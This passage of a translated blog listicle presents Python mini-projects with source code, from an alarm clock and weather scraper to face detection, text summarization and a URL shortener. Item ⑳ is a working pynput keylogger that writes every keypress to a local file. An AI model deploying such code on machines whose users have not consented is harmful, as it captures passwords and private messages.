Worth bookmarking: 22 Python mini-projects (with source code)

    # alarm_time is expected in the form "HH:MM:SS AM" or "HH:MM:SS PM"
    alarm_hour = alarm_time[0:2]
    alarm_minute = alarm_time[3:5]
    alarm_seconds = alarm_time[6:8]
    alarm_period = alarm_time[9:11].upper()
    print("Setting up alarm...")
    while True:
        now = datetime.now()
        current_hour = now.strftime("%I")
        current_minute = now.strftime("%M")
        current_seconds = now.strftime("%S")
        current_period = now.strftime("%p")
        # Ring only when period, hour, minute and second all match
        if (alarm_period == current_period
                and alarm_hour == current_hour
                and alarm_minute == current_minute
                and alarm_seconds == current_seconds):
            print("Wake Up!")
            playsound('audio.mp3')  # download the alarm sound from the link
            break

⑬ Audiobook

Goal: Write a Python script that converts a PDF file into an audiobook.

Hint: Use the pyttsx3 library to convert the text to speech.

Install: pyttsx3, PyPDF2
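The article gives no code for this project, so here is a minimal sketch of one way it could look. It assumes PyPDF2 3.x (its `PdfReader` class and `extract_text()` method) and pyttsx3's default speech driver; the function names `split_into_chunks` and `pdf_to_audiobook` and the 1000-character chunk size are illustrative choices, not part of the original.

```python
def split_into_chunks(text, max_chars=1000):
    """Split text on whitespace into chunks of about max_chars characters.

    A single word longer than max_chars is kept whole.
    """
    chunks, current = [], ""
    for word in text.split():
        candidate = f"{current} {word}".strip()
        if len(candidate) > max_chars and current:
            chunks.append(current)
            current = word
        else:
            current = candidate
    if current:
        chunks.append(current)
    return chunks


def pdf_to_audiobook(pdf_path, audio_path=None):
    """Read a PDF aloud, or save the speech to audio_path if one is given."""
    # Third-party packages are imported lazily so the helper above
    # can be used without them.
    import pyttsx3
    from PyPDF2 import PdfReader  # assumption: PyPDF2 3.x API

    reader = PdfReader(pdf_path)
    # extract_text() may return an empty result for image-only pages
    text = " ".join((page.extract_text() or "") for page in reader.pages)

    engine = pyttsx3.init()
    if audio_path:
        engine.save_to_file(text, audio_path)
    else:
        for chunk in split_into_chunks(text):
            engine.say(chunk)
    engine.runAndWait()
```

Calling `pdf_to_audiobook("book.pdf")` would read the file aloud, and passing a second argument such as `"book.mp3"` would write the speech to that file instead; both file names are placeholders.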

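⑭ Weather app

Goal: Write a Python script that takes a city name and scrapes the weather information for that city.

Hint: You can use the BeautifulSoup and requests libraries to scrape the data directly from the Google search results page.

Install: requests, BeautifulSoup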

    from bs4 import BeautifulSoup
    import requests

    headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'}

    def weather(city):
        # Turn "new york weather" into "new+york+weather" for the query string
        city = city.replace(" ", "+")
        res = requests.get(f'https://www.google.com/search?q={city}&oq={city}&aqs=chrome.0.35i39l2j0l4j46j69i60.6128j1j7&sourceid=chrome&ie=UTF-8', headers=headers)
        print("Searching in google...\n")
        soup = BeautifulSoup(res.text, 'html.parser')
        # The wob_* ids are the elements of Google's weather widget
        location = soup.select('#wob_loc')[0].getText().strip()
        time = soup.select('#wob_dts')[0].getText().strip()
        info = soup.select('#wob_dc')[0].getText().strip()
        temperature = soup.select('#wob_tm')[0].getText().strip()
        print(location)
        print(time)
        print(info)
        print(temperature + "°C")

    print("enter the city name")
    city = input()
    city = city + " weather"
    weather(city)
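The script builds the query by replacing spaces with `+`, which breaks on city names containing characters such as `&` or accented letters. A small sketch of a safer alternative using the standard library's `quote_plus`; the helper name `build_weather_url` is hypothetical, and the URL is reduced to the `q` parameter only.

```python
from urllib.parse import quote_plus


def build_weather_url(city):
    """Return a Google search URL for '<city> weather' with the query escaped."""
    query = quote_plus(f"{city.strip()} weather")
    return f"https://www.google.com/search?q={query}"


print(build_weather_url("New York"))
```

The returned URL could be passed to `requests.get` together with the same `headers` dictionary as in the script.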

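⑮ Face detection

Goal: Write a Python script that detects the faces in an image and saves all of them to a folder.

Hint: You can use a Haar cascade classifier to detect the faces. It returns the coordinates of each detected face, which you can use to crop the face and save it to a file.

Install: OpenCV.

Download: haarcascade\_frontalface\_default.xml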

    import cv2

    # Load the cascade
    face_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')
    # Read the input image
    img = cv2.imread('images/img0.jpg')
    # Convert into grayscale
    gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
    # Detect faces
    faces = face_cascade.detectMultiScale(gray, 1.3, 4)
    crop_face = None
    # Crop and save each face, then draw a rectangle around it
    for (x, y, w, h) in faces:
        crop_face = img[y:y + h, x:x + w].copy()
        cv2.imwrite(str(w) + str(h) + '_faces.jpg', crop_face)
        cv2.rectangle(img, (x, y), (x + w, y + h), (255, 0, 0), 2)
    # Display the output
    cv2.imshow('img', img)
    if crop_face is not None:  # no crop exists when no face was detected
        cv2.imshow("imgcropped", crop_face)
    cv2.waitKey()
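The stated goal is to save every face into a folder, but the script writes the crops into the working directory under names built from width and height, so two faces of the same size overwrite each other. A possible sketch of the saving step; the folder name `faces`, the `face_NNN.jpg` naming scheme and both function names are assumptions made for illustration.

```python
import os


def face_output_path(out_dir, index):
    """Build a unique path such as faces/face_003.jpg for the index-th face."""
    return os.path.join(out_dir, f"face_{index:03d}.jpg")


def save_faces(img, faces, out_dir="faces"):
    """Crop every (x, y, w, h) box from img and write it into out_dir."""
    import cv2  # imported lazily so the path helper works without OpenCV

    os.makedirs(out_dir, exist_ok=True)
    paths = []
    for index, (x, y, w, h) in enumerate(faces):
        path = face_output_path(out_dir, index)
        cv2.imwrite(path, img[y:y + h, x:x + w])
        paths.append(path)
    return paths
```

With the variables from the script, `save_faces(img, faces)` would be called right after `detectMultiScale` and before any rectangles are drawn, so the saved crops stay free of the blue border.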

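⑯ Reminder app

Goal: Create a reminder app that reminds you to do something at a specific time (with a desktop notification).

Hint: The time module can be used to wait until the reminder is due, and the ToastNotifier class from the win10toast library can be used to show the desktop notification.

Install: win10toast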

    from win10toast import ToastNotifier
    import time

    toaster = ToastNotifier()
    header = input("Title of reminder\n")
    text = input("Message of reminder\n")
    try:
        time_min = float(input("In how many minutes?\n"))
    except ValueError:
        # Ask once more if the first answer was not a number
        time_min = float(input("In how many minutes?\n"))
    time_min = time_min * 60  # convert minutes to seconds
    print("Setting up reminder...")
    time.sleep(2)
    print("all set!")
    time.sleep(time_min)
    toaster.show_toast(f"{header}",
                       f"{text}",
                       duration=10,
                       threaded=True)
    # Keep the script alive while the notification is still showing
    while toaster.notification_active():
        time.sleep(0.005)
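The script blocks in `time.sleep` until the reminder is due. As an alternative, the waiting can be handed to a background timer from the standard library, which also keeps the scheduling logic independent of the Windows-only notification call. This is only a sketch; `schedule_reminder` is a hypothetical helper, and the callback is whatever should happen when the reminder fires.

```python
import threading


def schedule_reminder(minutes, callback, *args):
    """Run callback(*args) after the given number of minutes.

    Returns the started threading.Timer so the caller can cancel() or join() it.
    """
    if minutes < 0:
        raise ValueError("minutes must be non-negative")
    timer = threading.Timer(minutes * 60, callback, args=args)
    timer.start()
    return timer
```

For example, `schedule_reminder(5, toaster.show_toast, header, text)` would show the toast from the script five minutes later, and calling `cancel()` on the returned timer drops the reminder.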

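⑰ Wikipedia article summary

Goal: Generate a summary of the article at a user-provided link using a simple method.

Hint: You can scrape the article text and build the summary by extraction, that is, by picking out its highest-scoring sentences.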

    from bs4 import BeautifulSoup
    import re
    import requests
    import heapq
    # The NLTK tokenizer and stop-word data must be downloaded beforehand with nltk.download()
    from nltk.tokenize import sent_tokenize, word_tokenize
    from nltk.corpus import stopwords

    url = str(input("Paste the url\n"))
    num = int(input("Enter the Number of Sentence you want in the summary"))
    headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'}
    res = requests.get(url, headers=headers)
    summary = ""
    soup = BeautifulSoup(res.text, 'html.parser')
    content = soup.find_all("p")
    for text in content:
        summary += text.text

    def clean(text):
        text = re.sub(r"\[[0-9]*\]", " ", text)  # drop citation markers such as [12]
        text = text.lower()
        text = re.sub(r'\s+', " ", text)
        text = re.sub(r",", " ", text)
        return text

    summary = clean(summary)
    print("Getting the data...\n")

    # Tokenizing
    sent_tokens = sent_tokenize(summary)
    summary = re.sub(r"[^a-zA-Z]", " ", summary)
    word_tokens = word_tokenize(summary)

    # Removing stop words and counting the remaining words
    word_frequency = {}
    stop_words = set(stopwords.words("english"))
    for word in word_tokens:
        if word not in stop_words:
            if word not in word_frequency.keys():
                word_frequency[word] = 1
            else:
                word_frequency[word] += 1
    maximum_frequency = max(word_frequency.values())
    print(maximum_frequency)
    # Normalize every count by the highest count
    for word in word_frequency.keys():
        word_frequency[word] = (word_frequency[word] / maximum_frequency)
    print(word_frequency)

    # Score each sentence (shorter than 30 words) by the weights of its words
    sentences_score = {}
    for sentence in sent_tokens:
        for word in word_tokenize(sentence):
            if word in word_frequency.keys():
                if (len(sentence.split(" "))) < 30:
                    if sentence not in sentences_score.keys():
                        sentences_score[sentence] = word_frequency[word]
                    else:
                        sentences_score[sentence] += word_frequency[word]
    print(max(sentences_score.values()))

    def get_key(val):
        for key, value in sentences_score.items():
            if val == value:
                return key

    key = get_key(max(sentences_score.values()))
    print(key + "\n")
    print(sentences_score)
    summary = heapq.nlargest(num, sentences_score, key=sentences_score.get)
    print(" ".join(summary))
    summary = " ".join(summary)
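The scoring idea in the script can be tried without a network connection or NLTK. The sketch below is a simplified stand-in, not the author's code: it uses a naive regex sentence split and a tiny hand-written stop-word list (both assumptions), and it leaves out the 30-word sentence cap. The function name `summarize` is hypothetical.

```python
import heapq
import re
from collections import Counter

# Tiny stand-in stop-word list; the script uses NLTK's full English list.
STOP_WORDS = {"the", "a", "an", "is", "are", "of", "and", "to", "in", "it", "on"}


def summarize(text, num_sentences=1):
    """Return the num_sentences highest-scoring sentences of text."""
    # Naive split after ., ! or ? followed by whitespace
    sentences = [s.strip() for s in re.split(r"(?<=[.!?])\s+", text) if s.strip()]
    words = [w for w in re.findall(r"[a-z]+", text.lower()) if w not in STOP_WORDS]
    if not words:
        return []
    counts = Counter(words)
    top = max(counts.values())
    # Normalized frequency of every non-stop word
    weights = {word: count / top for word, count in counts.items()}
    # A sentence's score is the sum of the weights of its words
    scores = {}
    for sentence in sentences:
        tokens = re.findall(r"[a-z]+", sentence.lower())
        scores[sentence] = sum(weights.get(token, 0.0) for token in tokens)
    return heapq.nlargest(num_sentences, scores, key=scores.get)


sample = "Python is a language. Python is popular and Python is readable. Cats sleep."
print(summarize(sample, 1))
```

In the sample, "python" is the most frequent word, so the sentence that mentions it twice receives the highest score and is returned as the one-sentence summary.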



⑱ Fetching Google search results

Goal: Create a script that fetches data from Google Search for a given query.

    from bs4 import BeautifulSoup
    import requests

    headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'}

    def google(query):
        query = query.replace(" ", "+")
        try:
            url = f'https://www.google.com/search?q={query}&oq={query}&aqs=chrome…69i57j46j69i59j35i39j0j46j0l2.4948j0j7&sourceid=chrome&ie=UTF-8'
            res = requests.get(url, headers=headers)
            soup = BeautifulSoup(res.text, 'html.parser')
        except requests.RequestException:
            return "Make sure you have an internet connection"
        # Try the CSS classes of the different answer boxes in turn;
        # select(...)[0] raises IndexError when a class is not on the page
        try:
            try:
                ans = soup.select('.RqBzHd')[0].getText().strip()
            except IndexError:
                try:
                    title = soup.select('.AZCkJd')[0].getText().strip()
                    try:
                        ans = soup.select('.e24Kjd')[0].getText().strip()
                    except IndexError:
                        ans = ""
                    ans = f'{title}\n{ans}'
                except IndexError:
                    try:
                        ans = soup.select('.hgKElc')[0].getText().strip()
                    except IndexError:
                        ans = soup.select('.kno-rdesc span')[0].getText().strip()
        except IndexError:
            ans = "can't find on google"
        return ans

    result = google(str(input("Query\n")))
    print(result)


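⑲ Currency converter

Goal: Write a Python script that converts an amount from one currency into another currency chosen by the user.

Hint: Call an exchange-rate API from Python, or use the forex-python module, to get real-time exchange rates.

Install: forex-python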
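The article gives no code for this project. A minimal sketch, assuming forex-python's `CurrencyRates.get_rate(base, target)` call is used for the live rate; the function names `convert` and `live_convert` and the rounding to two decimals are illustrative choices.

```python
def convert(amount, rate):
    """Convert amount using a known exchange rate, rounded to 2 decimals."""
    return round(amount * rate, 2)


def live_convert(amount, base, target):
    """Fetch the current base->target rate with forex-python and convert amount."""
    # Imported lazily: third-party package that needs network access
    from forex_python.converter import CurrencyRates

    rate = CurrencyRates().get_rate(base, target)
    return convert(amount, rate)
```

A call such as `live_convert(10, "USD", "INR")` would return the value of 10 US dollars in Indian rupees at the rate reported at that moment; keeping `convert` separate makes the arithmetic testable without a network connection.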

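⑳ Keylogger

Goal: Write a Python script that saves every key the user presses to a text file.

Hint: pynput is a Python library for controlling and monitoring the keyboard and mouse, and it can also be used to build a keylogger. Simply read the keys the user presses and, after a certain number of keys, save them to a text file.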

    from pynput.keyboard import Key, Listener

    keys = []

    def on_press(key):
        global keys
        # str(key) wraps character keys in quotes, e.g. "'a'"
        string = str(key).replace("'", "")
        keys.append(string)
        main_string = "".join(keys)
        print(main_string)
        # Flush the buffer to disk once it holds more than 15 characters
        if len(main_string) > 15:
            with open('keys.txt', 'a') as f:
                f.write(main_string)
            keys = []

    def on_release(key):
        # Returning False stops the listener when Esc is released
        if key == Key.esc:
            return False

    with Listener(on_press=on_press, on_release=on_release) as listener:
        listener.join()

㉑ Article reader

Goal: Write a Python script that automatically reads aloud the article at a given link.

    import pyttsx3
    import requests
    from bs4 import BeautifulSoup

    url = str(input("Paste article url\n"))

    def content(url):
        res = requests.get(url)
        soup = BeautifulSoup(res.text, 'html.parser')
        # Collect the text of every <p> element on the page
        articles = []
        for paragraph in soup.select('p'):
            articles.append(paragraph.getText().strip())
        contents = " ".join(articles)
        return contents

    engine = pyttsx3.init('sapi5')  # 'sapi5' is the Windows speech driver
    voices = engine.getProperty('voices')
    engine.setProperty('voice', voices[0].id)

    def speak(audio):
        engine.say(audio)
        engine.runAndWait()

    contents = content(url)
    print(contents)  ## In case you want to see the content
    speak(contents)
    #engine.save_to_file
    #engine.runAndWait() ## In case you want to save the article as an audio file

㉒ URL shortener

Goal: Write a Python script that shortens a given URL using an API.

    from __future__ import with_statement
    import contextlib
    # Fall back to the Python 2 module names when the Python 3 ones are missing
    try:
        from urllib.parse import urlencode
    except ImportError:
        from urllib import urlencode
    try:
        from urllib.request import urlopen
    except ImportError:
        from urllib2 import urlopen
    import sys

    def make_tiny(url):
        request_url = ('http://tinyurl.com/api-create.php?' +
                       urlencode({'url': url}))
        with contextlib.closing(urlopen(request_url)) as response:
            return response.read().decode('utf-8')

    def main():
        # Shorten every URL passed on the command line
        for tinyurl in map(make_tiny, sys.argv[1:]):
            print(tinyurl)

    if __name__ == '__main__':
        main()

-----------------------------OUTPUT------------------------

python url_shortener.py https://www.wikipedia.org/

https://tinyurl.com/buf3qt3

Finally

I usually work with Python 3.6 and the PyCharm IDE.
